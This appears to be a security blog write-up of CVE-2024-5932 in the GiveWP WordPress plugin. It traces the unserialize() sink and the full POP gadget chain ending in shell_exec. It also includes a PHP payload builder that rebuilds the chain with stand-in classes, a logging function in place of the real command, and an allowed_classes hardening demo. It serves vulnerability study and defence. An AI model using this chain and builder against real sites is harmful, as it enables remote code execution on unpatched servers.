CVE-2024-5932
date: Aug 21, 2024
slug: PHP deserialization - POP chain
status: Published
tags: PHP, WebSec
summary: 1 Day - GiveWP
type: Post
PHP POP Chain for Remote Code Execution in GiveWP Plugin
Vulnerable Code Overview
- Donation Form Processing:
  - The `give_process_donation_form()` function handles and processes donation form submissions.
  - Validation occurs through the `give_donation_form_validate_fields()` function.
  - Serialized fields are checked by `give_donation_form_has_serialized_fields()`.
- User Title Assignment:
  - The `give_get_donation_form_user()` function assigns `user_title` from the `give_title` POST parameter.
- Donation Data Preparation:
  - The `give_process_donation_form()` function prepares `$donation_data` and sends it to the payment gateway via `give_send_to_gateway()`.
- Donor Metadata Insertion:
  - The `insert()` method of the `DonorRepository` class inserts the donor metadata, including the prefix, which is derived from the `user_title` parameter.
- Unserialization and Vulnerability Triggering:
  - The `_give_donor_title_prefix` meta is unserialized in the `setup_user_info()` function. Because the stored value originates from the `give_title` POST parameter, this `unserialize()` call is the attacker-reachable sink, and a serialized object graph placed there drives the POP chain below.
Exploitation Steps
The chain, gadget by gadget (each arrow reads as "leads to"):

`Stripe\StripeObject` -> `__toString()` (magic method) -> `toArray()` -> `$_values['foo']` is an instance of `Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData` -> `toArray()` -> `getLegacyBillingAddress()` -> `$userInfo['address']` is an instance of `Give` -> `address1` property read -> `__get()` magic method -> `$container` is an instance of `Give\Vendors\Faker\ValidGenerator` -> `get()` -> `__call()` magic method -> `$validator` property is the string `'shell_exec'` -> invoked via `call_user_func($this->validator, $res)`

Step by step:

- Instance of `Stripe\StripeObject`: The POP chain begins with an instance of `Stripe\StripeObject`. When the unserialized object is used in a string context, its `__toString()` magic method is called, which invokes the `toArray()` method.
- Instance of `Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData`: `toArray()` processes `$_values['foo']`, which is set to an instance of `GiveInsertPaymentData`. That class's own `toArray()` calls `getLegacyBillingAddress()`.
- Instance of `Give`: `getLegacyBillingAddress()` reads `$userInfo['address']`, which can be set to an instance of the `Give` class, and then accesses its `address1` property. `Give` defines no such property, so its `__get()` magic method is invoked, and `__get()` forwards the lookup by calling the `get()` method of whatever object sits in the `$container` property.
- Instance of `Give\Vendors\Faker\ValidGenerator`: `$container` is set to an instance of `ValidGenerator` (the Faker copy bundled under the plugin's `Give\Vendors` prefix). `ValidGenerator` has no `get()` method, so the call lands in its `__call()` magic method.
- Execution of `shell_exec`: The `$validator` property of `ValidGenerator` is set to the string `'shell_exec'`. `__call()` ends in `call_user_func($this->validator, $res)`, which executes `shell_exec()` with the attacker-supplied `$res` as the command.
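As an added example (my code, not the GiveWP plugin, the Stripe SDK or Faker), the chain above rebuilt with minimal stand-in classes: each keeps only the magic methods and properties the chain needs, a logging function stands in for `shell_exec`, and a small builder serializes the gadget tree the way a payload generator would. It assumes that Faker's `ValidGenerator::__call()` first forwards the call to a wrapped generator and then hands the result to `$validator` (that is where `$res` comes from); the `DefaultGenerator` stand-in that supplies the argument is my simplification. The final lines run the same payload through `unserialize()` with `allowed_classes` disabled, shown as the generic hardening for this sink, not as the project's actual patch.

```php
<?php
// Added example (not GiveWP, Stripe or Faker code): minimal stand-ins that keep
// only the magic-method shapes the chain relies on, plus a payload builder and
// the vulnerable/hardened sink. A logging function replaces shell_exec.

namespace Stripe {
    class StripeObject {
        protected $_values = [];
        public function __toString() { return json_encode($this->toArray()); }
        // Nested objects that expose toArray() are converted recursively.
        public function toArray() {
            $out = [];
            foreach ($this->_values as $k => $v) {
                $out[$k] = (is_object($v) && method_exists($v, 'toArray')) ? $v->toArray() : $v;
            }
            return $out;
        }
    }
}

namespace Give\PaymentGateways\DataTransferObjects {
    class GiveInsertPaymentData {
        public $userInfo = [];
        public function toArray() { return ['billing' => $this->getLegacyBillingAddress()]; }
        public function getLegacyBillingAddress() {
            $address = $this->userInfo['address'];       // attacker-chosen object
            return ['line1' => $address->address1];      // undefined property -> __get()
        }
    }
}

namespace Give\Vendors\Faker {
    // ValidGenerator forwards each call to a wrapped generator and then passes
    // the result to $validator. DefaultGenerator is the stand-in whose __call()
    // simply returns $default (assumption: simplified from Faker's classes).
    class DefaultGenerator {
        protected $default;
        public function __call($method, $args) { return $this->default; }
    }
    class ValidGenerator {
        protected $generator;
        protected $validator;
        public function __call($name, $arguments) {
            $res = call_user_func_array([$this->generator, $name], $arguments);
            call_user_func($this->validator, $res);      // sink: 'shell_exec' in the real chain
            return $res;
        }
    }
}

namespace {
    class Give {
        protected $container;
        public function __get($name) { return $this->container->get($name); }
    }

    // Payload builders need to set protected properties that have no setters.
    function setProp(object $obj, string $prop, $value): void {
        $r = new ReflectionProperty($obj, $prop);
        $r->setAccessible(true);
        $r->setValue($obj, $value);
    }

    // Assemble the gadget chain and serialize it; $callable stands in for 'shell_exec'.
    function buildPayload(string $callable, string $arg): string {
        $gen = new Give\Vendors\Faker\DefaultGenerator();
        setProp($gen, 'default', $arg);
        $valid = new Give\Vendors\Faker\ValidGenerator();
        setProp($valid, 'generator', $gen);
        setProp($valid, 'validator', $callable);
        $give = new Give();
        setProp($give, 'container', $valid);
        $dto = new Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData();
        $dto->userInfo = ['address' => $give];
        $root = new Stripe\StripeObject();
        setProp($root, '_values', ['foo' => $dto]);
        return serialize($root);
    }

    $hits = [];
    function recordCall(string $cmd): bool { global $hits; $hits[] = $cmd; return true; }

    $payload = buildPayload('recordCall', 'id');          // ('shell_exec', 'id') in a real attack
    echo $payload, PHP_EOL;

    // Vulnerable sink shape: unserialize stored donor meta, then use it as a string.
    $prefix = unserialize($payload);
    $fullName = $prefix . ' Doe';                         // string context fires __toString()
    var_dump($hits);                                      // records what the validator callable received

    // Hardened sink: with no classes allowed, only __PHP_Incomplete_Class is produced
    // and no magic method ever runs.
    $safe = unserialize($payload, ['allowed_classes' => false]);
    var_dump($safe instanceof __PHP_Incomplete_Class);
}
```

Run it with `php`; the printed serialized string is the kind of value that has to reach the `unserialize()` sink, and `$hits` shows that the callable held in `$validator` ran with the attacker-chosen argument. Visibility matters when building such payloads by hand: protected properties serialize with a `\0*\0` prefix on the name, which is why the builder sets them through reflection and lets `serialize()` produce the exact encoding instead of typing the string out.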